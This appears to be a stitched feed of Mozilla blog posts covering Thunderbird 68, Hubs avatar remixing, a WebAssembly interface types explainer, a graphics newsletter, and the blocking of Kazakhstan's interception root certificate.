Other Filelink providers like Box and Dropbox are not included by default but can be added by grabbing the Dropbox and Box add-ons.

Other Notable Changes

There are many other smaller changes that make Thunderbird 68 feel polished and powerful including an updated To/CC/BCC selector in the compose window, filters can now be set to run periodically, and feed articles now show external attachments as links.

There are many other updates in this release, you can see a list of all of them in the Thunderbird 68 release notes. If you would like to try the newest Thunderbird, head to our website and download it today!

QMOFirefox 69 Beta 14 Testday Results

Hello Mozillians!

As you may already know, Friday August 16th – we held a new Testday event, for Firefox 69 Beta 14.

Thank you all for helping us make Mozilla a better place: Fernando, noelonassis !

Results: Several test cases were executed for: Anti-tracking.

Thanks for another awesome testday, we appreciate your contribution! 🙂

We hope to see you all in our next events, keep an eye on QMO.
We will make announcements as soon as something shows up!


Mozilla VR BlogNew Avatar Features in Hubs

New Avatar Features in Hubs

It is now easier than ever to customize avatars for Hubs! Choosing the way that you represent yourself in a 3D space is an important part of interacting in a virtual world, and we want to make it possible for anyone to have creative control over how they choose to show up in their communities. With the new avatar remixing update, members of the Hubs community can publish avatars that they create under a remixable, Creative Commons license, and grant others the ability to derive new works from those avatars. We’ve also added more options for creating custom avatars.

When you change your avatar in Hubs, you will now have the opportunity to browse through 'Featured' avatars and ‘Newest’ avatars. Avatars that are remixable will have an icon on them that allows you to save a version of that avatar to your own ‘My Avatars’ library, where you can customize the textures on the avatar to create your own spin on the original work. The ‘Red Panda’ avatar below is a remix of the original Panda Bot.

New Avatar Features in Hubs

In addition to remixing avatars, you can create avatars by uploading a binary glTF file (or selecting one of the base bots that Hubs provides) and uploading up to four texture maps to the model. We have a number of resources available on GitHub for creating custom textures, as well as sets to get you started. You can also make your own designs with a 2D image editor or a 3D texture painting program.

The Hubs base avatar is a glTF model that has four texture maps and supports physically-based rendering (PBR) materials. This allows a great deal of flexibility in what kind of avatars can be created while still providing a quick way to create custom base color maps. For users who are familiar with 3D modeling, you can also create your own new avatar style from scratch, or by using the provided .blend files in the avatar-pipelines GitHub repo.

New Avatar Features in Hubs

We’ve also made it easier to share avatars with one another inside a Hubs room. A tab for ‘Avatars’ now appears in the Create menu, and you can place thumbnails for avatars in the room you’re in to quickly swap between them. This will also allow others in the room to easily change to a specific avatar, which is a fun way to share avatars with a group.

New Avatar Features in Hubs

These improvements to our avatar tools are just the start of what we’re working on to increase opportunities that Hubs users have available to express themselves on the platform. Making it easy to change your avatar - over and over again - allows users to have flexibility over how much personal information they want their avatar to reveal, and easily change from one digital body to another depending on how they’re using Hubs at a given time. While, at Mozilla, we find Panda Robots to be perfectly suited to company meetings, other communities and groups will have their own established social norms for professional activities. We want to support a rich, creative ecosystem for our users, and we can't wait to see what you create!

Open Policy & AdvocacyMozilla Mornings on the future of EU content regulation

On 10 September, Mozilla will host the next installment of our EU Mozilla Mornings series – regular breakfast meetings where we bring together policy experts, policymakers and practitioners for insight and discussion on the latest EU digital policy developments.

The next installment will focus on the future of EU content regulation. We’re bringing together a high-level panel to discuss how the European Commission should approach the mooted Digital Services Act, and to lay out a vision for a sustainable and rights-protective content regulation framework in Europe.


Werner Stengg
Head of Unit, E-Commerce & Platforms, European Commission DG CNECT
Alan Davidson
Vice President of Global Policy, Trust & Security, Mozilla
Liz Carolan
Executive Director, Digital Action
Eliska Pirkova
Europe Policy Analyst, Access Now

Moderated by Brian Maguire, EURACTIV

 Logistical information

10 September 2019
L42 Business Centre, rue de la Loi 42, Brussels 1040


Register your attendance here

The post Mozilla Mornings on the future of EU content regulation appeared first on Open Policy & Advocacy.

SUMO BlogIntroducing Bryce and Brady

Hello SUMO Community,

I’m thrilled to share this update with you today. Bryce and Brady have joined us last week and will be able to help out on Support for some of the new efforts Mozilla are working on towards creating a connected and integrated Firefox experience.

They are going to be involved with new products, but also they won’t forget to put extra effort in providing support on forums and as well as serving as an escalation point for hard to solve issues.

Here is a short introduction to Brady and Bryce:

Hi! My name is Brady, and I am one of the new members of the SUMO team. I am originally from Boise, Idaho and am currently going to school for a Computer Science degree at Boise State. In my free time, I’m normally playing video games, writing, drawing, or enjoying the Sawtooths. I will be providing support for Mozilla products and for the SUMO team.

Hello!  My name is Bryce, I was born and raised in San Diego and I reside in Boise, Idaho.  Growing up I spent a good portion of my life trying to be the best sponger(boogie boarder) and longboarder in North County San Diego.  While out in the ocean I had all sorts of run-ins with sea creatures; but nothing to scary. I am also an IN-N-Out fan, as you may find me sporting their merchandise with boardshorts and the such.   I am truly excited to be part of this amazing group of fun loving folks and I am looking forward to getting to know everyone.

Please welcome them warmly!

hacks.mozilla.orgWebAssembly Interface Types: Interoperate with All the Things!

People are excited about running WebAssembly outside the browser.

That excitement isn’t just about WebAssembly running in its own standalone runtime. People are also excited about running WebAssembly from languages like Python, Ruby, and Rust.

Why would you want to do that? A few reasons:

  • Make “native” modules less complicated
    Runtimes like Node or Python’s CPython often allow you to write modules in low-level languages like C++, too. That’s because these low-level languages are often much faster. So you can use native modules in Node, or extension modules in Python. But these modules are often hard to use because they need to be compiled on the user’s device. With a WebAssembly “native” module, you can get most of the speed without the complication.
  • Make it easier to sandbox native code
    On the other hand, low-level languages like Rust wouldn’t use WebAssembly for speed. But they could use it for security. As we talked about in the WASI announcement, WebAssembly gives you lightweight sandboxing by default. So a language like Rust could use WebAssembly to sandbox native code modules.
  • Share native code across platforms
    Developers can save time and reduce maintainance costs if they can share the same codebase across different platforms (e.g. between the web and a desktop app). This is true for both scripting and low-level languages. And WebAssembly gives you a way to do that without making things slower on these platforms.

Scripting languages like Python and Ruby saying 'We like WebAssembly's speed', low-level languages like Rust and C++ saying, 'and we like the security it could give us' and all of them saying 'and we all want to make developers more effective'

So WebAssembly could really help other languages with important problems.

But with today’s WebAssembly, you wouldn’t want to use it in this way. You can run WebAssembly in all of these places, but that’s not enough.

Right now, WebAssembly only talks in numbers. This means the two languages can call each other’s functions.

But if a function takes or returns anything besides numbers, things get complicated. You can either:

  • Ship one module that has a really hard-to-use API that only speaks in numbers… making life hard for the module’s user.
  • Add glue code for every single environment you want this module to run in… making life hard for the module’s developer.

But this doesn’t have to be the case.

It should be possible to ship a single WebAssembly module and have it run anywhere… without making life hard for either the module’s user or developer.

user saying 'what even is this API?' vs developer saying 'ugh, so much glue code to worry about' vs both saying 'wait, it just works?'

So the same WebAssembly module could use rich APIs, using complex types, to talk to:

  • Modules running in their own native runtime (e.g. Python modules running in a Python runtime)
  • Other WebAssembly modules written in different source languages (e.g. a Rust module and a Go module running together in the browser)
  • The host system itself (e.g. a WASI module providing the system interface to an operating system or the browser’s APIs)

A wasm file with arrows pointing to and from: logos for different runtimes (Ruby, php, and Python), other wasm files compiled from Rust and Go, and host systems like the OS or browser

And with a new, early-stage proposal, we’re seeing how we can make this Just Work™, as you can see in this demo.

So let’s take a look at how this will work. But first, let’s look at where we are today and the problems that we’re trying to solve.

WebAssembly talking to JS

WebAssembly isn’t limited to the web. But up to now, most of WebAssembly’s development has focused on the Web.

That’s because you can make better designs when you focus on solving concrete use cases. The language was definitely going to have to run on the Web, so that was a good use case to start with.

This gave the MVP a nicely contained scope. WebAssembly only needed to be able to talk to one language—JavaScript.

And this was relatively easy to do. In the browser, WebAssembly and JS both run in the same engine, so that engine can help them efficiently talk to each other.

A js file asking the engine to call a WebAssembly function

The engine asking the WebAssembly file to run the function

But there is one problem when JS and WebAssembly try to talk to each other… they use different types.

Currently, WebAssembly can only talk in numbers. JavaScript has numbers, but also quite a few more types.

And even the numbers aren’t the same. WebAssembly has 4 different kinds of numbers: int32, int64, float32, and float64. JavaScript currently only has Number (though it will soon have another number type, BigInt).

The difference isn’t just in the names for these types. The values are also stored differently in memory.

First off, in JavaScript any value, no matter the type, is put in something called a box (and I explained boxing more in another article).

WebAssembly, in contrast, has static types for its numbers. Because of this, it doesn’t need (or understand) JS boxes.

This difference makes it hard to communicate with each other.

JS asking wasm to add 5 and 7, and Wasm responding with 9.2368828e+18

But if you want to convert a value from one number type to the other, there are pretty straightforward rules.

Because it’s so simple, it’s easy to write down. And you can find this written down in WebAssembly’s JS API spec.

A large book that has mappings between the wasm number types and the JS number types

This mapping is hardcoded in the engines.

It’s kind of like the engine has a reference book. Whenever the engine has to pass parameters or return values between JS and WebAssembly, it pulls this reference book off the shelf to see how to convert these values.

JS asking the engine to call wasm's add function with 5 and 7, and the engine looking up how to do conversions in the book

Having such a limited set of types (just numbers) made this mapping pretty easy. That was great for an MVP. It limited how many tough design decisions needed to be made.

But it made things more complicated for the developers using WebAssembly. To pass strings between JS and WebAssembly, you had to find a way to turn the strings into an array of numbers, and then turn an array of numbers back into a string. I explained this in a previous post.

JS putting numbers into WebAssembly's memory

This isn’t difficult, but it is tedious. So tools were built to abstract this away.

For example, tools like Rust’s wasm-bindgen and Emscripten’s Embind automatically wrap the WebAssembly module with JS glue code that does this translation from strings to numbers.

JS file complaining about having to pass a string to Wasm, and the JS glue code offering to do all the work

And these tools can do these kinds of transformations for other high-level types, too, such as complex objects with properties.

This works, but there are some pretty obvious use cases where it doesn’t work very well.

For example, sometimes you just want to pass a string through WebAssembly. You want a JavaScript function to pass a string to a WebAssembly function, and then have WebAssembly pass it to another JavaScript function.

Here’s what needs to happen for that to work:

  1. the first JavaScript function passes the string to the JS glue code

  2. the JS glue code turns that string object into numbers and then puts those numbers into linear memory

  3. then passes a number (a pointer to the start of the string) to WebAssembly

  4. the WebAssembly function passes that number over to the JS glue code on the other side

  5. the second JavaScript function pulls all of those numbers out of linear memory and then decodes them back into a string object

  6. which it gives to the second JS function

JS file passing string 'Hello' to JS glue code
JS glue code turning string into numbers and putting that in linear memory
JS glue code telling engine to pass 2 to wasm
Wasm telling engine to pass 2 to JS glue code
JS glue code taking bytes from linear memory and turning them back into a string
JS glue code passing string to JS file

So the JS glue code on one side is just reversing the work it did on the other side. That’s a lot of work to recreate what’s basically the same object.

If the string could just pass straight through WebAssembly without any transformations, that would be way easier.

WebAssembly wouldn’t be able to do anything with this string—it doesn’t understand that type. We wouldn’t be solving that problem.

But it could just pass the string object back and forth between the two JS functions, since they do understand the type.

So this is one of the reasons for the WebAssembly reference types proposal. That proposal adds a new basic WebAssembly type called anyref.

With an anyref, JavaScript just gives WebAssembly a reference object (basically a pointer that doesn’t disclose the memory address). This reference points to the object on the JS heap. Then WebAssembly can pass it to other JS functions, which know exactly how to use it.

JS passing a string to Wasm and the engine turning it into a pointer
Wasm passing the string to a different JS file, and the engine just passes the pointer on

So that solves one of the most annoying interoperability problems with JavaScript. But that’s not the only interoperability problem to solve in the browser.

There’s another, much larger, set of types in the browser. WebAssembly needs to be able to interoperate with these types if we’re going to have good performance.

WebAssembly talking directly to the browser

JS is only one part of the browser. The browser also has a lot of other functions, called Web APIs, that you can use.

Behind the scenes, these Web API functions are usually written in C++ or Rust. And they have their own way of storing objects in memory.

Web APIs’ parameters and return values can be lots of different types. It would be hard to manually create mappings for each of these types. So to simplify things, there’s a standard way to talk about the structure of these types—Web IDL.

When you’re using these functions, you’re usually using them from JavaScript. This means you are passing in values that use JS types. How does a JS type get converted to a Web IDL type?

Just as there is a mapping from WebAssembly types to JavaScript types, there is a mapping from JavaScript types to Web IDL types.

So it’s like the engine has another reference book, showing how to get from JS to Web IDL. And this mapping is also hardcoded in the engine.

A book that has mappings between the JS types and Web IDL types

For many types, this mapping between JavaScript and Web IDL is pretty straightforward. For example, types like DOMString and JS’s String are compatible and can be mapped directly to each other.

Now, what happens when you’re trying to call a Web API from WebAssembly? Here’s where we get to the problem.

Currently, there is no mapping between WebAssembly types and Web IDL types. This means that, even for simple types like numbers, your call has to go through JavaScript.

Here’s how this works:

  1. WebAssembly passes the value to JS.
  2. In the process, the engine converts this value into a JavaScript type, and puts it in the JS heap in memory
  3. Then, that JS value is passed to the Web API function. In the process, the engine converts the JS value into a Web IDL type, and puts it in a different part of memory, the renderer’s heap.

Wasm passing number to JS
Engine converting the int32 to a Number and putting it in the JS heap
Engine converting the Number to a double, and putting that in the renderer heap

This takes more work than it needs to, and also uses up more memory.

There’s an obvious solution to this—create a mapping from WebAssembly directly to Web IDL. But that’s not as straightforward as it might seem.

For simple Web IDL types like boolean and unsigned long (which is a number), there are clear mappings from WebAssembly to Web IDL.

But for the most part, Web API parameters are more complex types. For example, an API might take a dictionary, which is basically an object with properties, or a sequence, which is like an array.

To have a straightforward mapping between WebAssembly types and Web IDL types, we’d need to add some higher-level types. And we are doing that—with the GC proposal. With that, WebAssembly modules will be able to create GC objects—things like structs and arrays—that could be mapped to complicated Web IDL types.

But if the only way to interoperate with Web APIs is through GC objects, that makes life harder for languages like C++ and Rust that wouldn’t use GC objects otherwise. Whenever the code interacts with a Web API, it would have to create a new GC object and copy values from its linear memory into that object.

That’s only slightly better than what we have today with JS glue code.

We don’t want JS glue code to have to build up GC objects—that’s a waste of time and space. And we don’t want the WebAssembly module to do that either, for the same reasons.

We want it to be just as easy for languages that use linear memory (like Rust and C++) to call Web APIs as it is for languages that use the engine’s built-in GC. So we need a way to create a mapping between objects in linear memory and Web IDL types, too.

There’s a problem here, though. Each of these languages represents things in linear memory in different ways. And we can’t just pick one language’s representation. That would make all the other languages less efficient.

someone standing between the names of linear memory languages like C, C++, and Rust, pointing to Rust and saying 'I pick... that one!'. A red arrow points to the person saying 'bad idea'

But even though the exact layout in memory for these things is often different, there are some abstract concepts that they usually share in common.

For example, for strings the language often has a pointer to the start of the string in memory, and the length of the string. And even if the string has a more complicated internal representation, it usually needs to convert strings into this format when calling external APIs anyways.

This means we can reduce this string down to a type that WebAssembly understands… two i32s.

The string Hello in linear memory, with an offset of 2 and length of 5. Red arrows point to offset and length and say 'types that WebAssembly understands!'

We could hardcode a mapping like this in the engine. So the engine would have yet another reference book, this time for WebAssembly to Web IDL mappings.

But there’s a problem here. WebAssembly is a type-checked language. To keep things secure, the engine has to check that the calling code passes in types that match what the callee asks for.

This is because there are ways for attackers to exploit type mismatches and make the engine do things it’s not supposed to do.

If you’re calling something that takes a string, but you try to pass the function an integer, the engine will yell at you. And it should yell at you.

So we need a way for the module to explicitly tell the engine something like: “I know Document.createElement() takes a string. But when I call it, I’m going to pass you two integers. Use these to create a DOMString from data in my linear memory. Use the first integer as the starting address of the string and the second as the length.”

This is what the Web IDL proposal does. It gives a WebAssembly module a way to map between the types that it uses and Web IDL’s types.

These mappings aren’t hardcoded in the engine. Instead, a module comes with its own little booklet of mappings.

Wasm file handing a booklet to the engine and saying `Here's a little guidebook. It will tell you how to translate my types to interface types`

So this gives the engine a way to say “For this function, do the type checking as if these two integers are a string.”

The fact that this booklet comes with the module is useful for another reason, though.

Sometimes a module that would usually store its strings in linear memory will want to use an anyref or a GC type in a particular case… for example, if the module is just passing an object that it got from a JS function, like a DOM node, to a Web API.

So modules need to be able to choose on a function-by-function (or even even argument-by-argument) basis how different types should be handled. And since the mapping is provided by the module, it can be custom-tailored for that module.

Wasm telling engine 'Read carefully... For some function that take DOMStrings, I'll give you two numbers. For others, I'll just give you the DOMString that JS gave to me.'

How do you generate this booklet?

The compiler takes care of this information for you. It adds a custom section to the WebAssembly module. So for many language toolchains, the programmer doesn’t have to do much work.

For example, let’s look at how the Rust toolchain handles this for one of the simplest cases: passing a string into the alert function.

extern "C" {
    fn alert(s: &str);

The programmer just has to tell the compiler to include this function in the booklet using the annotation #[wasm_bindgen]. By default, the compiler will treat this as a linear memory string and add the right mapping for us. If we needed it to be handled differently (for example, as an anyref) we’d have to tell the compiler using a second annotation.

So with that, we can cut out the JS in the middle. That makes passing values between WebAssembly and Web APIs faster. Plus, it means we don’t need to ship down as much JS.

And we didn’t have to make any compromises on what kinds of languages we support. It’s possible to have all different kinds of languages that compile to WebAssembly. And these languages can all map their types to Web IDL types—whether the language uses linear memory, or GC objects, or both.

Once we stepped back and looked at this solution, we realized it solved a much bigger problem.

WebAssembly talking to All The Things

Here’s where we get back to the promise in the intro.

Is there a feasible way for WebAssembly to talk to all of these different things, using all these different type systems?

A wasm file with arrows pointing to and from: logos for different runtimes (Ruby, php, and Python), other wasm files compiled from Rust and Go, and host systems like the OS or browser

Let’s look at the options.

You could try to create mappings that are hardcoded in the engine, like WebAssembly to JS and JS to Web IDL are.

But to do that, for each language you’d have to create a specific mapping. And the engine would have to explicitly support each of these mappings, and update them as the language on either side changes. This creates a real mess.

This is kind of how early compilers were designed. There was a pipeline for each source language to each machine code language. I talked about this more in my first posts on WebAssembly.

We don’t want something this complicated. We want it to be possible for all these different languages and platforms to talk to each other. But we need it to be scalable, too.

So we need a different way to do this… more like modern day compiler architectures. These have a split between front-end and back-end. The front-end goes from the source language to an abstract intermediate representation (IR). The back-end goes from that IR to the target machine code.

This is where the insight from Web IDL comes in. When you squint at it, Web IDL kind of looks like an IR.

Now, Web IDL is pretty specific to the Web. And there are lots of use cases for WebAssembly outside the web. So Web IDL itself isn’t a great IR to use.

But what if you just use Web IDL as inspiration and create a new set of abstract types?

This is how we got to the WebAssembly interface types proposal.

Diagram showing WebAssembly interface types in the middle. On the left is a wasm module, which could be compiled from Rust, Go, C, etc. Arrows point from these options to the types in the middle. On the right are host languages like JS, Python, and Ruby; host platforms like .NET, Node, and operating systems, and more wasm modules. Arrows point from these options to the types in the middle.

These types aren’t concrete types. They aren’t like the int32 or float64 types in WebAssembly today. There are no operations on them in WebAssembly.

For example, there won’t be any string concatenation operations added to WebAssembly. Instead, all operations are performed on the concrete types on either end.

There’s one key point that makes this possible: with interface types, the two sides aren’t trying to share a representation. Instead, the default is to copy values between one side and the other.

saying 'since this is a string in linear memory, I know how to manipulate it' and browser saying 'since this is a DOMString, I know how to manipulate it'

There is one case that would seem like an exception to this rule: the new reference values (like anyref) that I mentioned before. In this case, what is copied between the two sides is the pointer to the object. So both pointers point to the same thing. In theory, this could mean they need to share a representation.

In cases where the reference is just passing through the WebAssembly module (like the anyref example I gave above), the two sides still don’t need to share a representation. The module isn’t expected to understand that type anyway… just pass it along to other functions.

But there are times where the two sides will want to share a representation. For example, the GC proposal adds a way to create type definitions so that the two sides can share representations. In these cases, the choice of how much of the representation to share is up to the developers designing the APIs.

This makes it a lot easier for a single module to talk to many different languages.

In some cases, like the browser, the mapping from the interface types to the host’s concrete types will be baked into the engine.

So one set of mappings is baked in at compile time and the other is handed to the engine at load time.

Engine holding Wasm's mapping booklet and its own mapping reference book for Wasm Interface Types to Web IDL, saying 'So this maps to a string? Ok, I can take it from here to the DOMString that the function is asking for using my hardcoded bindings'

But in other cases, like when two WebAssembly modules are talking to each other, they both send down their own little booklet. They each map their functions’ types to the abstract types.

Engine reaching for mapping booklets from two wasm files, saying 'Ok, let's see how these map to each other'

This isn’t the only thing you need to enable modules written in different source languages to talk to each other (and we’ll write more about this in the future) but it is a big step in that direction.

So now that you understand why, let’s look at how.

What do these interface types actually look like?

Before we look at the details, I should say again: this proposal is still under development. So the final proposal may look very different.

Two construction workers with a sign that says 'Use caution'

Also, this is all handled by the compiler. So even when the proposal is finalized, you’ll only need to know what annotations your toolchain expects you to put in your code (like in the wasm-bindgen example above). You won’t really need to know how this all works under the covers.

But the details of the proposal are pretty neat, so let’s dig into the current thinking.

The problem to solve

The problem we need to solve is translating values between different types when a module is talking to another module (or directly to a host, like the browser).

There are four places where we may need to do a translation:

For exported functions

  • accepting parameters from the caller
  • returning values to the caller

For imported functions

  • passing parameters to the function
  • accepting return values from the function

And you can think about each of these as going in one of two directions:

  • Lifting, for values leaving the module. These go from a concrete type to an interface type.
  • Lowering, for values coming into the module. These go from an interface type to a concrete type.

Telling the engine how to transform between concrete types and interface types

So we need a way to tell the engine which transformations to apply to a function’s parameters and return values. How do we do this?

By defining an interface adapter.

For example, let’s say we have a Rust module compiled to WebAssembly. It exports a greeting_ function that can be called without any parameters and returns a greeting.

Here’s what it would look like (in WebAssembly text format) today.

a Wasm module that exports a function that returns two numbers. See proposal linked above for details.

So right now, this function returns two integers.

But we want it to return the string interface type. So we add something called an interface adapter.

If an engine understands interface types, then when it sees this interface adapter, it will wrap the original module with this interface.

an interface adapter that returns a string. See proposal linked above for details.

It won’t export the greeting_ function anymore… just the greeting function that wraps the original. This new greeting function returns a string, not two numbers.

This provides backwards compatibility because engines that don’t understand interface types will just export the original greeting_ function (the one that returns two integers).

How does the interface adapter tell the engine to turn the two integers into a string?

It uses a sequence of adapter instructions.

Two adapter instructions inside of the adapter function. See proposal linked above for details.

The adapter instructions above are two from a small set of new instructions that the proposal specifies.

Here’s what the instructions above do:

  1. Use the call-export adapter instruction to call the original greeting_ function. This is the one that the original module exported, which returned two numbers. These numbers get put on the stack.
  2. Use the memory-to-string adapter instruction to convert the numbers into the sequence of bytes that make up the string. We have to specifiy “mem” here because a WebAssembly module could one day have multiple memories. This tells the engine which memory to look in. Then the engine takes the two integers from the top of the stack (which are the pointer and the length) and uses those to figure out which bytes to use.

This might look like a full-fledged programming language. But there is no control flow here—you don’t have loops or branches. So it’s still declarative even though we’re giving the engine instructions.

What would it look like if our function also took a string as a parameter (for example, the name of the person to greet)?

Very similar. We just change the interface of the adapter function to add the parameter. Then we add two new adapter instructions.

Here’s what these new instructions do:

  1. Use the arg.get instruction to take a reference to the string object and put it on the stack.
  2. Use the string-to-memory instruction to take the bytes from that object and put them in linear memory. Once again, we have to tell it which memory to put the bytes into. We also have to tell it how to allocate the bytes. We do this by giving it an allocator function (which would be an export provided by the original module).

One nice thing about using instructions like this: we can extend them in the future… just as we can extend the instructions in WebAssembly core. We think the instructions we’re defining are a good set, but we aren’t committing to these being the only instruct for all time.

If you’re interested in understanding more about how this all works, the explainer goes into much more detail.

Sending these instructions to the engine

Now how do we send this to the engine?

These annotations gets added to the binary file in a custom section.

A file split in two. The top part is labeled 'known sections, e.g. code, data'. The bottom part is labeled 'custom sections, e.g. interface adapter'

If an engine knows about interface types, it can use the custom section. If not, the engine can just ignore it, and you can use a polyfill which will read the custom section and create glue code.

How is this different than CORBA, Protocol Buffers, etc?

There are other standards that seem like they solve the same problem—for example CORBA, Protocol Buffers, and Cap’n Proto.

How are those different? They are solving a much harder problem.

They are all designed so that you can interact with a system that you don’t share memory with—either because it’s running in a different process or because it’s on a totally different machine across the network.

This means that you have to be able to send the thing in the middle—the “intermediate representation” of the objects—across that boundary.

So these standards need to define a serialization format that can efficiently go across the boundary. That’s a big part of what they are standardizing.

Two computers with wasm files on them and multiple lines flowing into a single line connecting connecting them. The single line represents serialization and is labelled 'IR'

Even though this looks like a similar problem, it’s actually almost the exact inverse.

With interface types, this “IR” never needs to leave the engine. It’s not even visible to the modules themselves.

The modules only see the what the engine spits out for them at the end of the process—what’s been copied to their linear memory or given to them as a reference. So we don’t have to tell the engine what layout to give these types—that doesn’t need to be specified.

What is specified is the way that you talk to the engine. It’s the declarative language for this booklet that you’re sending to the engine.

Two wasm files with arrows pointing to the word 'IR' with no line between, because there is no serialization happening.

This has a nice side effect: because this is all declarative, the engine can see when a translation is unnecessary—like when the two modules on either side are using the same type—and skip the translation work altogether.

The engine looking at the booklets for a Rust module and a Go module and saying 'Ooh, you’re both using linear memory for this string... I’ll just do a quick copy between your memories, then'

How can you play with this today?

As I mentioned above, this is an early stage proposal. That means things will be changing rapidly, and you don’t want to depend on this in production.

But if you want to start playing with it, we’ve implemented this across the toolchain, from production to consumption:

  • the Rust toolchain
  • wasm-bindgen
  • the Wasmtime WebAssembly runtime

And since we maintain all these tools, and since we’re working on the standard itself, we can keep up with the standard as it develops.

Even though all these parts will continue changing, we’re making sure to synchronize our changes to them. So as long as you use up-to-date versions of all of these, things shouldn’t break too much.

Construction worker saying 'Just be careful and stay on the path'

So here are the many ways you can play with this today. For the most up-to-date version, check out this repo of demos.

Thank you

  • Thank you to the team who brought all of the pieces together across all of these languages and runtimes: Alex Crichton, Yury Delendik, Nick Fitzgerald, Dan Gohman, and Till Schneidereit
  • Thank you to the proposal co-champions and their colleagues for their work on the proposal: Luke Wagner, Francis McCabe, Jacob Gravelle, Alex Crichton, and Nick Fitzgerald
  • Thank you to my fantastic collaborators, Luke Wagner and Till Schneidereit, for their invaluable input and feedback on this article

The post WebAssembly Interface Types: Interoperate with All the Things! appeared first on Mozilla Hacks - the Web developer blog.

The Mozilla BlogMozilla takes action to protect users in Kazakhstan

Today, Mozilla and Google took action to protect the online security and privacy of individuals in Kazakhstan. Together the companies deployed technical solutions within Firefox and Chrome to block the Kazakhstan government’s ability to intercept internet traffic within the country.

The response comes after credible reports that internet service providers in Kazakhstan have required people in the country to download and install a government-issued certificate on all devices and in every browser in order to access the internet. This certificate is not trusted by either of the companies, and once installed, allowed the government to decrypt and read anything a user types or posts, including intercepting their account information and passwords. This targeted people visiting popular sites Facebook, Twitter and Google, among others.

“People around the world trust Firefox to protect them as they navigate the internet, especially when it comes to keeping them safe from attacks like this that undermine their security. We don’t take actions like this lightly, but protecting our users and the integrity of the web is the reason Firefox exists.” — Marshall Erwin, Senior Director of Trust and Security, Mozilla

“We will never tolerate any attempt, by any organization—government or otherwise—to compromise Chrome users’ data. We have implemented protections from this specific issue, and will always take action to secure our users around the world.” — Parisa Tabriz, Senior Engineering Director, Chrome

This is not the first attempt by the Kazakhstan government to intercept the internet traffic of everyone in the country. In 2015, the Kazakhstan government attempted to have a root certificate included in Mozilla’s trusted root store program. After it was discovered that they were intending to use the certificate to intercept user data, Mozilla denied the request. Shortly after, the government forced citizens to manually install its certificate but that attempt failed after organizations took legal action.

Each company will deploy a technical solution unique to its browser. For additional information on those solutions please see the below links.


Russian: Если вы хотите ознакомиться с этим текстом на русском языке, нажмите здесь.

Kazakh: Бұл постыны қазақ тілінде мына жерден оқыңыз.





The post Mozilla takes action to protect users in Kazakhstan appeared first on The Mozilla Blog.

Web Application SecurityProtecting our Users in Kazakhstan

Russian translation: Если вы хотите ознакомиться с этим текстом на русском языке, нажмите здесь.

Kazakh translation: Бұл постыны қазақ тілінде мына жерден оқыңыз.

In July, a Firefox user informed Mozilla of a security issue impacting Firefox users in Kazakhstan: They stated that Internet Service Providers (ISPs) in Kazakhstan had begun telling their customers that they must install a government-issued root certificate on their devices. What the ISPs didn’t tell their customers was that the certificate was being used to intercept network communications. Other users and researchers confirmed these claims, and listed 3 dozen popular social media and communications sites that were affected.

The security and privacy of HTTPS encrypted communications in Firefox and other browsers relies on trusted Certificate Authorities (CAs) to issue website certificates only to someone that controls the domain name or website. For example, you and I can’t obtain a trusted certificate for www.facebook.com because Mozilla has strict policies for all CAs trusted by Firefox which only allow an authorized person to get a certificate for that domain. However, when a user in Kazakhstan installs the root certificate provided by their ISP, they are choosing to trust a CA that doesn’t have to follow any rules and can issue a certificate for any website to anyone. This enables the interception and decryption of network communications between Firefox and the website, sometimes referred to as a Monster-in-the-Middle (MITM) attack.

We believe this act undermines the security of our users and the web, and it directly contradicts Principle 4 of the Mozilla Manifesto that states, “Individuals’ security and privacy on the internet are fundamental and must not be treated as optional.”

To protect our users, Firefox, together with Chrome, will block the use of the Kazakhstan root CA certificate. This means that it will not be trusted by Firefox even if the user has installed it. We believe this is the appropriate response because users in Kazakhstan are not being given a meaningful choice over whether to install the certificate and because this attack undermines the integrity of a critical network security mechanism.  When attempting to access a website that responds with this certificate, Firefox users will see an error message stating that the certificate should not be trusted.

We encourage users in Kazakhstan affected by this change to research the use of virtual private network (VPN) software, or the Tor Browser, to access the Web. We also strongly encourage anyone who followed the steps to install the Kazakhstan government root certificate to remove it from your devices and to immediately change your passwords, using a strong, unique password for each of your online accounts.

The post Protecting our Users in Kazakhstan appeared first on Mozilla Security Blog.

Mozilla Gfx Teammoz://gfx newsletter #47

Hi there! Time for another mozilla graphics newsletter. In the comments section of the previous newsletter, Michael asked about the relation between WebRender and WebGL, I’ll try give a short answer here.

Both WebRender and WebGL need access to the GPU to do their work. At the moment both of them use the OpenGL API, either directly or through ANGLE which emulates OpenGL on top of D3D11. They, however, each work with their own OpenGL context. Frames produced with WebGL are sent to WebRender as texture handles. WebRender, at the API level, has a single entry point for images, video frames, canvases, in short for every grid of pixels in some flavor of RGB format, be them CPU-side buffers or already in GPU memory as is normally the case for WebGL. In order to share textures between separate OpenGL contexts we rely on platform-specific APIs such as EGLImage and DXGI.

Beyond that there isn’t any fancy interaction between WebGL and WebRender. The latter sees the former as a image producer just like 2D canvases, video decoders and plain static images.

What’s new in gfx

Wayland and hidpi improvements on Linux

  • Martin Stransky made a proof of concept implementation of DMABuf textures in Gecko’s IPC mechanism. This dmabuf EGL texture backend on Wayland is similar what we have on Android/Mac. Dmabuf buffers can be shared with main/compositor process, can be bound as a render target or texture and can be located at GPU memory. The same dma buf buffer can be also used as hardware overlay when it’s attached to wl_surface/wl_subsurface as wl_buffer.
  • Jan Horak fixed a bug that prevented tabs from rendering after restoring a minimized window.
  • Jan Horak fixed the window parenting hierarchy with Wayland.
  • Jan Horak fixed a bug with hidpi that was causing select popups to render incorrectly after scrolling.

WebGL multiview rendering

WebGL’s multiview rendering extension has been approved by the working group and it’s implementation by Jeff Gilbert will be shipping in Firefox 70.
This extension allows more efficient rendering into multiple viewports, which is most commonly use by VR/AR for rendering both eyes at the same time.

Better high dynamic range support

Jean Yves landed the first part of his HDR work (a set of 14 patches). While we can’t yet output HDR content to HDR screen, this work greatly improved the correctness of the conversion from various HDR formats to low dynamic range sRGB.

You can follow progress on the color space meta bug.

What’s new in WebRender

WebRender is a GPU based 2D rendering engine for web written in Rust, currently powering Firefox‘s rendering engine as well as the research web browser servo.

If you are curious about the state of WebRender on a particular platform, up to date information is available at http://arewewebrenderyet.com

Speaking of which, darkspirit enabled webrender on Nightly for Nvidia+Nouveau drivers linux users in Firefox Nightly.

More filters in WebRender

When We run into a primitive that isn’t supported by WebRender, we make it go through software fallback implementation which can be slow for some things. SVG filters are a good example of primitives that perform much better if implemented on the GPU in WebRender.
Connor Brewster has been working on implementing a number of SVG filters in WebRender:

See the SVG filters in WebRender meta bug.

